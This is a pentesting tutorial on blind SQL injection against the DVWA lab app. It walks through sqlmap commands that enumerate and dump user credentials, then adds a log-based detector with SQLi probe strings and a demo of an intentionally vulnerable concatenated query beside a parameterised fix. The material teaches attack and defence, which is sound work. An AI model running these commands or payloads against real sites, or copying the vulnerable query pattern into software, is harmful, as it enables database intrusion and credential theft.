Tips for an Information Security Analyst/Pentester career - Episode 12 (reviewed version): Blind SQL injection with DVWA
Last reviewed: 8/27/2017
Intro
We talked about SQL injection over the previous episode.
I manually entered injection strings in the input fields to get at the contents of the database.
However, this isn't the only, nor the best, approach.
If we can't enter the commands manually (because of input sanitization), or we want a faster approach, we can try a blind SQL injection attack.
In this case, we'll have a tool run the SQL injection for us instead of doing it by hand.
Prep
I enter a valid user id (3) in DVWA and click Submit.
We need the URL of the page we're in (shown below).
At that point, I grab the cookie session ID by right-clicking on an empty point in the page and clicking Page Info and then Security.
Sqlmap execution
We launch the following command in Sqlmap:
sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" --dump-all
After retrieving all the information, sqlmap starts cracking the retrieved password hashes.
Then it dumps all this information to a file.
We can confirm that a blind technique is being used by adding -v (verbose output) to the command, as shown below.
Afterward, we want to know the name of the database, so we use the following command:
sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" --dbs
The command returns 7 available databases, as shown below.
Now that we know the name of the database (dvwa), we can analyze its tables:
sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" -D dvwa --tables
The command returns two tables. Apparently, users is the one we want to know more about.
Now, we want to have a look at the columns in the users table, and we run the following command:
sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" -T users --columns
The command returns two interesting columns (user and password).
At this point, we want to extract information from these two columns and we run a new command for this purpose:
sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" -C user,password --dump
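The sequence of sqlmap runs above leaves a very recognizable trace in the web server's access log: one client, one path, hundreds of requests in a short time, an id parameter that should only ever be an integer but now carries quotes and SQL keywords, and (unless the operator changes it) sqlmap's default User-Agent, which contains the string "sqlmap". The following detector is an added example written for this post, not code from the original, from DVWA or from sqlmap. The log lines, the burst threshold and the regular expression of suspicious tokens are all constructed for the example; a real deployment would tune them to its own traffic.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Tokens that have no business in a parameter that should hold a numeric id
# (constructed list; extend for your own application).
SQLI_RE = re.compile(
    r"""['"]|--|/\*|\b(?:and|or)\b\s*\S+\s*[=<>]|\bsleep\s*\(|\bbenchmark\s*\(|\bwaitfor\b""",
    re.IGNORECASE,
)

BURST_THRESHOLD = 5                   # constructed: requests to one path from one client ...
BURST_WINDOW = timedelta(seconds=60)  # ... inside this window count as a burst


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)  # values are URL-decoded here
    return rec


def analyse(lines, param="id"):
    """Return (kind, client_ip, detail) findings for the three signals described above."""
    findings = []
    seen = defaultdict(list)  # (ip, path) -> request timestamps
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if "sqlmap" in rec["ua"].lower():
            findings.append(("tool_user_agent", rec["ip"], rec["ua"]))
        for value in rec["params"].get(param, []):
            if not value.isdigit() and SQLI_RE.search(value):
                findings.append(("sql_tokens_in_param", rec["ip"], value))
        seen[(rec["ip"], rec["path"])].append(rec["ts"])
    for (ip, path), stamps in seen.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):  # sliding window over the sorted timestamps
            while stamps[end] - stamps[start] > BURST_WINDOW:
                start += 1
            if end - start + 1 >= BURST_THRESHOLD:
                findings.append(("request_burst", ip,
                                 f"{end - start + 1} requests to {path} within {BURST_WINDOW.seconds}s"))
                break  # one burst finding per client/path is enough
    return findings


def summarise(lines):
    """Count findings by kind, e.g. {'tool_user_agent': 6, ...}."""
    counts = {}
    for kind, _, _ in analyse(lines):
        counts[kind] = counts.get(kind, 0) + 1
    return counts


# Constructed sample: one ordinary visitor, then an automated scan of the blind SQLi page.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Aug/2017:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit HTTP/1.1" 200 1500 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Aug/2017:10:00:02 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit HTTP/1.1" 200 1500 "-" "sqlmap/1.1 (http://sqlmap.org)"
10.0.0.9 - - [27/Aug/2017:10:00:02 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=3%27&Submit=Submit HTTP/1.1" 200 1400 "-" "sqlmap/1.1 (http://sqlmap.org)"
10.0.0.9 - - [27/Aug/2017:10:00:03 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=3%27%20AND%201%3D1%20AND%20%27a%27%3D%27a&Submit=Submit HTTP/1.1" 200 1500 "-" "sqlmap/1.1 (http://sqlmap.org)"
10.0.0.9 - - [27/Aug/2017:10:00:03 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=3%27%20AND%201%3D2%20AND%20%27a%27%3D%27a&Submit=Submit HTTP/1.1" 200 1400 "-" "sqlmap/1.1 (http://sqlmap.org)"
10.0.0.9 - - [27/Aug/2017:10:00:04 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=3%20AND%20SLEEP%285%29&Submit=Submit HTTP/1.1" 200 1500 "-" "sqlmap/1.1 (http://sqlmap.org)"
10.0.0.9 - - [27/Aug/2017:10:00:09 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=3%20AND%201%3D1&Submit=Submit HTTP/1.1" 200 1500 "-" "sqlmap/1.1 (http://sqlmap.org)"
"""

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG.splitlines()):
        print(finding)
    print(summarise(SAMPLE_LOG.splitlines()))
```

Of the three signals, the User-Agent check is the weakest (sqlmap's --random-agent and --user-agent options replace it), the token check catches a single probing request even before a full scan starts, and the burst check is the one that remains once an attacker hides the other two, because a blind technique by its nature needs many requests per extracted byte.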
Results
Usernames and passwords are stored under /root/.sqlmap/output/localhost/dump/dvwa/users.csv
By opening it with Excel (under OS X), we can view all usernames and passwords for that specific database.
Wrap-up
Blind SQL injection can be an alternative and more insidious approach than the traditional SQL injection.
However, blind injection might also be slower than a manual method.
It's a kind of set-and-forget approach, but it's the only alternative when input validation stops us from using normal SQL injection attacks.
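To show what the tool above is actually exploiting, and what closes it, here is an added example (my code, not DVWA's own source) that models the blind page's "does this user id exist" check in Python with an in-memory SQLite table. The table and its rows are constructed stand-ins for DVWA's users table. The first function builds the query by concatenating the request parameter into the SQL string, which is the defect the blind technique relies on; the second sends the value as a bound parameter, so whatever the client supplies is compared as data and can never change the query.

```python
import sqlite3


def make_db():
    """Constructed stand-in for DVWA's users table; the hashes are placeholders, not real values."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "<hash-placeholder>"), (2, "gordonb", "<hash-placeholder>"), (3, "1337", "<hash-placeholder>")],
    )
    return conn


def user_exists_vulnerable(conn, user_id):
    """Query built by string concatenation: the parameter becomes part of the SQL text."""
    query = f"SELECT user_id FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchone() is not None


def user_exists_safe(conn, user_id):
    """Parameterised query: the driver binds the value separately from the SQL text."""
    row = conn.execute("SELECT user_id FROM users WHERE user_id = ?", (user_id,)).fetchone()
    return row is not None


def compare(user_id):
    """Return (vulnerable_answer, safe_answer) for the same input, for side-by-side reading."""
    conn = make_db()
    return user_exists_vulnerable(conn, user_id), user_exists_safe(conn, user_id)


if __name__ == "__main__":
    # Legitimate inputs behave identically in both versions ...
    print("id=3   ->", compare("3"))
    print("id=999 ->", compare("999"))
    # ... but a tautology in the parameter makes only the concatenated query answer "exists",
    # which is exactly the true/false oracle a blind technique reads one bit at a time.
    print("tautology ->", compare("' OR '1'='1"))
```

The blind page never shows query results, only whether a row matched, so a single string-built query is enough for a tool to extract the whole database one boolean answer at a time. Input validation (rejecting anything that is not an integer here) narrows the exposure, but the parameterised query is the fix that does not depend on predicting every payload.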